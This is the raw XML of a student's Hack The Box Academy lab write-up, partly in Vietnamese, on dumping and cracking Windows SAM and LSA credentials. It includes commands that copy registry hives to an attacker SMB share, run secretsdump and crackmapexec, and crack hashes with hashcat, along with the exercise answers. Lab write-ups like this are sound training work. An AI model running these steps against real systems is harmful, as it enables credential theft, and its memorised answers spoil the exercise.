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F74F7" w14:textId="231C55D7" w:rsidR="006D10A9" w:rsidRDefault="006D10A9" w:rsidP="006D10A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006D10A9">
        <w:t>Where is the SAM database located in the Windows registry? (Format: ****\***)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B14AC22" w14:textId="07E85CFF" w:rsidR="006D10A9" w:rsidRDefault="006D10A9" w:rsidP="006D10A9">
      <w:r>
        <w:t>P/s : hklm\sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A29079" w14:textId="40C865A7" w:rsidR="00EE6E9E" w:rsidRDefault="00EE6E9E" w:rsidP="00EE6E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE6E9E">
        <w:t>Apply the concepts taught in this section to obtain the password to the ITbackdoor user account on the target. Submit the clear-text password as the answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A159E" w14:textId="50911495" w:rsidR="007605F9" w:rsidRDefault="002C1460">
      <w:r w:rsidRPr="002C1460">
        <w:t>xfreerdp /v:10.129.29.185  /u:Bob /p:HTB_@cademy_stdnt!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE1D03" w14:textId="0FEADE0C" w:rsidR="002C1460" w:rsidRDefault="002C1460">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4055198D" wp14:editId="5A7A8E69">
            <wp:extent cx="5943600" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1254985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8579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0A9" w14:textId="77777777" w:rsidR="00DF352C" w:rsidRDefault="00DF352C"/>
    <w:p w14:paraId="458DC023" w14:textId="6A10CCCA" w:rsidR="00DF352C" w:rsidRDefault="00DF352C" w:rsidP="00DF352C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218D4590" wp14:editId="02EAB8D3">
            <wp:extent cx="4053840" cy="3221850"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="313540162" name="Picture 1" descr="A screenshot of a desk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6018" name="Picture 1" descr="A screenshot of a deskto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1686" cy="32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8BBE" w14:textId="6B79D9FD" w:rsidR="00DF352C" w:rsidRDefault="00DF352C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CACA8A2" wp14:editId="1423F6D0">
            <wp:extent cx="4905375" cy="2990850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="168024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4676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5825" w14:textId="1271F6E7" w:rsidR="006325AA" w:rsidRDefault="006325AA">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916BAB3" w14:textId="77777777" w:rsidR="006325AA" w:rsidRDefault="006325AA" w:rsidP="006325AA">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>lyquockhanh)-[~/Documents]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758FC399" w14:textId="77777777" w:rsidR="009C4570" w:rsidRDefault="006325AA" w:rsidP="006325AA">
      <w:r>
        <w:t>└─# sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support HTBAcademy  /root/Documents/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F2C6EF" w14:textId="295679EA" w:rsidR="006325AA" w:rsidRDefault="006325AA" w:rsidP="006325AA">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643928C" w14:textId="0F04389B" w:rsidR="009C4570" w:rsidRDefault="009C4570" w:rsidP="006325AA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FFC3BD2" wp14:editId="61B348D7">
            <wp:extent cx="5943600" cy="1243965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19729983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98388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DC1D" w14:textId="03504506" w:rsidR="00FD75FD" w:rsidRDefault="00FD75FD" w:rsidP="006325AA">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959BC83" w14:textId="6A98FCAB" w:rsidR="00FD75FD" w:rsidRDefault="00FD75FD" w:rsidP="006325AA">
      <w:r>
        <w:t xml:space="preserve">move sam.save </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00534BB2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.10.15.15\HTBAcademy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A5D36E7" w14:textId="5E120899" w:rsidR="00FD75FD" w:rsidRDefault="00FD75FD" w:rsidP="006325AA">
      <w:r>
        <w:t>move system.save\\10.10.15.15\HTBAcademy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9FA8E" w14:textId="7F9F698A" w:rsidR="00FD75FD" w:rsidRDefault="00FD75FD" w:rsidP="006325AA">
      <w:r>
        <w:t>move security.save\\0.10.15.15\HTBAcademy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EF868A" w14:textId="5D1CED80" w:rsidR="00FD75FD" w:rsidRDefault="00FD75FD" w:rsidP="006325AA">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168F479" w14:textId="213159D5" w:rsidR="006325AA" w:rsidRDefault="00FD75FD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D500AA1" wp14:editId="6080B9EE">
            <wp:extent cx="4257675" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="39092634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26341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62D6" w14:textId="3412DEC7" w:rsidR="0089136F" w:rsidRDefault="00447CE1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52F9567A" wp14:editId="31705E84">
            <wp:extent cx="5943600" cy="377825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="93043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4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3C65" w14:textId="5B4DDACD" w:rsidR="00BB3A15" w:rsidRDefault="00BB3A15">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B540A50" w14:textId="77777777" w:rsidR="00BB3A15" w:rsidRDefault="00BB3A15" w:rsidP="00BB3A15">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>lyquockhanh)-[~/Documents]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E991D9" w14:textId="621C9B71" w:rsidR="00BB3A15" w:rsidRDefault="00BB3A15" w:rsidP="00BB3A15">
      <w:r>
        <w:t>└─# locate secretsdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F97B4D8" w14:textId="2B36D683" w:rsidR="00BB3A15" w:rsidRDefault="00BB3A15" w:rsidP="00BB3A15">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C467593" w14:textId="616D8ADD" w:rsidR="00BB3A15" w:rsidRDefault="00A54FAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4275201E" wp14:editId="73778461">
            <wp:extent cx="5943600" cy="1694180"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="5935918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9182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5A8E" w14:textId="4A4FFC0B" w:rsidR="00A54FAD" w:rsidRDefault="00A54FAD">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F76AE" w14:textId="77777777" w:rsidR="00A54FAD" w:rsidRDefault="00A54FAD" w:rsidP="00A54FAD">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>lyquockhanh)-[~/Documents]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A7C573" w14:textId="1D48EFB1" w:rsidR="00A54FAD" w:rsidRDefault="00A54FAD" w:rsidP="00A54FAD">
      <w:r>
        <w:t>└─# python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77985098" w14:textId="77777777" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="00A54FAD"/>
    <w:p w14:paraId="7617D79D" w14:textId="0A0C292A" w:rsidR="00A54FAD" w:rsidRDefault="00A54FAD" w:rsidP="00A54FAD">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1046CECD" w14:textId="38177943" w:rsidR="00E029D9" w:rsidRDefault="00E029D9" w:rsidP="00A54FAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7793D188" wp14:editId="54053270">
            <wp:extent cx="5943600" cy="2831465"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="7589571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5710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76C7" w14:textId="1192FE73" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="00A54FAD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F38436A" wp14:editId="13229977">
            <wp:extent cx="3733800" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7301471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4714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7813" w14:textId="7620DBDF" w:rsidR="00A54FAD" w:rsidRDefault="00A54FAD" w:rsidP="00A54FAD"/>
    <w:p w14:paraId="7E5C12B7" w14:textId="22D6650D" w:rsidR="00FE02E2" w:rsidRDefault="006D4DCE" w:rsidP="00A54FAD">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A03EEB" w14:textId="77777777" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="006D4DCE">
      <w:r>
        <w:t>┌──(root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>lyquockhanh)-[~/Documents]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCC699" w14:textId="7C9AAF8F" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="006D4DCE">
      <w:r>
        <w:t>└─# hashcat -m 1000  crackpass.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CAA0D" w14:textId="52411D6B" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="006D4DCE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="271275AD" wp14:editId="6D99A1E8">
            <wp:extent cx="5943600" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="368654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5490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4088" w14:textId="755C798E" w:rsidR="006D4DCE" w:rsidRDefault="006D4DCE" w:rsidP="006D4DCE">
      <w:r>
        <w:t>P/s : matrix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A02D2E7" w14:textId="4F9F9535" w:rsidR="00EE6E9E" w:rsidRDefault="00EE6E9E" w:rsidP="00EE6E9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE6E9E">
        <w:t>Dump the LSA secrets on the target and discover the credentials stored. Submit the username and password as the answer. (Format: username:password, Case-Sensitive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181E453" w14:textId="1F49576B" w:rsidR="00AC3774" w:rsidRDefault="00AC3774" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57961F41" w14:textId="681C21BE" w:rsidR="00AC3774" w:rsidRDefault="00AC3774" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Câu này tôi làm trên box của academy do box của tôi không đưa ra kết quả của crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235CFDF" w14:textId="75755255" w:rsidR="00915BB4" w:rsidRDefault="00915BB4" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B57732" w14:textId="77777777" w:rsidR="00AC3774" w:rsidRDefault="00AC3774" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>┌─[eu-academy-6]─[10.10.15.15]─[htb-ac-1522420@htb-fdsazdd2ro]─[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467A372" w14:textId="03849DD2" w:rsidR="00AC3774" w:rsidRDefault="00AC3774" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>└──</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>╼</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>★</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:r w:rsidR="0011306C" w:rsidRPr="0011306C">
        <w:t>crackmapexec smb 10.129.60.232 --local-auth -u Bob -p HTB_@cademy_stdnt! --lsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB75B72" w14:textId="41ACA079" w:rsidR="00915BB4" w:rsidRDefault="00915BB4" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73607B5F" w14:textId="3BBA50B2" w:rsidR="00915BB4" w:rsidRDefault="00915BB4" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237857E5" w14:textId="77777777" w:rsidR="0011306C" w:rsidRDefault="0011306C" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1253403C" w14:textId="66070961" w:rsidR="0011306C" w:rsidRDefault="0011306C" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36FFC526" wp14:editId="3F600054">
            <wp:extent cx="5943600" cy="1175385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="14126302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3026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C4A4" w14:textId="5698795A" w:rsidR="001B5EE0" w:rsidRDefault="001B5EE0" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>P/s :</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5EE0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B5EE0">
        <w:t>frontdesk:Password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4828FF8A" w14:textId="77777777" w:rsidR="00915BB4" w:rsidRDefault="00915BB4" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D490F1" w14:textId="77777777" w:rsidR="00915BB4" w:rsidRDefault="00915BB4" w:rsidP="00AC3774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144B2D2C" w14:textId="77777777" w:rsidR="00DF352C" w:rsidRDefault="00DF352C" w:rsidP="00DF352C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76765649" w14:textId="581565C8" w:rsidR="00B528CD" w:rsidRDefault="00B528CD" w:rsidP="002C0CC0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B528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52474E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F078D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94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5F9"/>
    <w:rsid w:val="0011306C"/>
    <w:rsid w:val="001B5EE0"/>
    <w:rsid w:val="002C0CC0"/>
    <w:rsid w:val="002C1460"/>
    <w:rsid w:val="00447CE1"/>
    <w:rsid w:val="00533C44"/>
    <w:rsid w:val="005E31CA"/>
    <w:rsid w:val="006325AA"/>
    <w:rsid w:val="006D10A9"/>
    <w:rsid w:val="006D4DCE"/>
    <w:rsid w:val="006F4FDC"/>
    <w:rsid w:val="007605F9"/>
    <w:rsid w:val="0089136F"/>
    <w:rsid w:val="00915BB4"/>
    <w:rsid w:val="009C4570"/>
    <w:rsid w:val="00A54FAD"/>
    <w:rsid w:val="00AC3774"/>
    <w:rsid w:val="00B528CD"/>
    <w:rsid w:val="00BB3A15"/>
    <w:rsid w:val="00DF352C"/>
    <w:rsid w:val="00E029D9"/>
    <w:rsid w:val="00EE6E9E"/>
    <w:rsid w:val="00FD75FD"/>
    <w:rsid w:val="00FE02E2"/>
    <w:rsid w:val="00FE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6250D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4BE69C4B-B800-4279-9B70-702EE4520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5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5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5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5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5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5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5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5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5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5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5F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D75F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5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77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file:///\\10.10.15.15\HTBAcademy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5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Quoc Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-21T12:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-22T09:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>